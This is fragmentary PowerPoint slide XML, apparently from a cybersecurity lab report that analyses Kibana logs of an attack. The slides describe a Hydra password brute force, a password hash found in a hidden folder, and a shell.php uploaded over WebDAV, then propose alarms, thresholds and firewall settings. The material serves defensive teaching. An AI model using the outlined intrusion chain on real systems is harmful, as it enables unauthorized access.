                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C6B151B-0C9F-BA56-8FFA-1E5E34149BC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5278350" y="21511"/>
            <a:ext cx="3856187" cy="2052576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D67060B3-D1A3-A399-96FF-CFD2DCDBF3C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="86993" y="1467751"/>
            <a:ext cx="3399567" cy="2098249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FA0DB54-BAB4-ABD1-C83E-34F25EF363A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979182" y="3369364"/>
            <a:ext cx="2592818" cy="1774135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8C67483-41E2-54E3-6C37-7A2C664ED93B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3807345" y="2044764"/>
            <a:ext cx="3053509" cy="1864532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB5492E-0A14-7F4A-5F72-331AAB2FB6CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732114" y="2659850"/>
            <a:ext cx="2319261" cy="23841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3" name="Google Shape;1173;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167448" y="550917"/>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The request occur on 26 April 2022 at 11:26.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>There are a total of 16398 hits/requests were made from the IP 192.168.1.90.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>There is a folder called “connect_to_crop_server” which was accessed 2 times. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>The secret_folder contained Ryan’s hash password for the employee’s credentials which can be used to uploading a payload to exploit other vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="265698" y="644754"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A9D53C3-0E4A-2CAA-EF8D-942F76599F11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="280105" y="2157358"/>
            <a:ext cx="5595947" cy="2267961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06845289-152A-FE4A-B9AA-6AE1F4D21914}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5938622" y="1269329"/>
            <a:ext cx="2925273" cy="1776059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0451F727-F846-1FDC-3A74-E862FC818ECA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6061956" y="3070842"/>
            <a:ext cx="2678604" cy="19592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67"/>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  </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184354" y="580225"/>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There were 16380 hits/requests were made in the attack by using Hydra.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>Thirty-two requests had been made before the attacker </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>successfully discovered the correct password.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="282604" y="674062"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A59988C-B32A-5DFB-FC17-A017995CE3A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="109330" y="1417224"/>
            <a:ext cx="4239867" cy="2615901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BADD6877-734B-080A-BFF1-A897FA4D43A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4435673" y="1459713"/>
            <a:ext cx="4254500" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AB3A089-FCD3-92F4-8960-2DD73EFA2D73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2822713" y="2844687"/>
            <a:ext cx="6211957" cy="11884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Finding the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr dirty="0">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2" name="Google Shape;1192;p68"/>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Add a screenshot of Kibana logs depicting the WebDAV connection.  </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204233" y="580225"/>
            <a:ext cx="8770802"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A total of 139 hits/requests were made for WebDAV directory (192.168.1.105/webdav).</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>Two files, which are passwd.dav and shell.php were requested by the following methods: GET, PROPFIND. OPTIONS and PUT.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="302483" y="674062"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E1F2FA-CC5F-945B-FB1E-89B37DB79E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="302483" y="1294663"/>
            <a:ext cx="5138530" cy="2730374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5FE4458-180E-55D3-0C06-336B96A1295D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4812900" y="3060610"/>
            <a:ext cx="4343400" cy="2027540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F59DD880-8181-D0DD-9E00-3CDBE0D1430A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202459" y="1245320"/>
            <a:ext cx="3953841" cy="182747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kind of alarm can be set to detect future port scans?</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An alert could be set to trigger when specific amount or large amount of traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An alert could also be set when a single source IP that targets multiple ports occurs over a short period of time</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A possible threshold for this alert could be if any single source IP address requests more than 10 requests per second and more than 10 seconds or 100 consecutive ping requests.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4476739" y="14772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100" dirty="0"/>
              <a:t>What configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>Enable only the traffic needed to access internal hosts, deny everything else. Including the standard ports, such as TCP 80 for HTTP and ICMP for ping requests. Keep ports closed when not in use, and whitelist the IP address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>Configure and setup the firewall to look for potentially malicious behavior over time and have rules in place to cut off attacks if a certain threshold reached. </a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>Create and setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0" err="1"/>
              <a:t>IPtables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t> for the firewall port blocking and scanning. An IDS like Kibana, or SPLUNK allows for an immediate alerting of port scan activity, thereby facilitating rapid response to the potential threats. </a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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100" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>An alarm should be configured and setup to notify if any request is made for hidden directories are for company use only and should not be accessible from outside the premises. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Another alarm can be setup to trigger if sequential requests for the directories are made from a single IP address. An attacker could find and see what is readily available and accessible by probing the directories.</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>The threshold for sequential requests from a single IP address should be set for greater than 0 requests made. Contact the SOC Analyst when it is triggered by external unknown IP address not in the network.</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="14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configuration can be set on the host to block unwanted access?</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stronger and complex usernames and passwords are requires for the users who have the access to the hidden directories.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use encryption to encrypt everything in the hidden directories including the contents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable directories listing in Apache</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
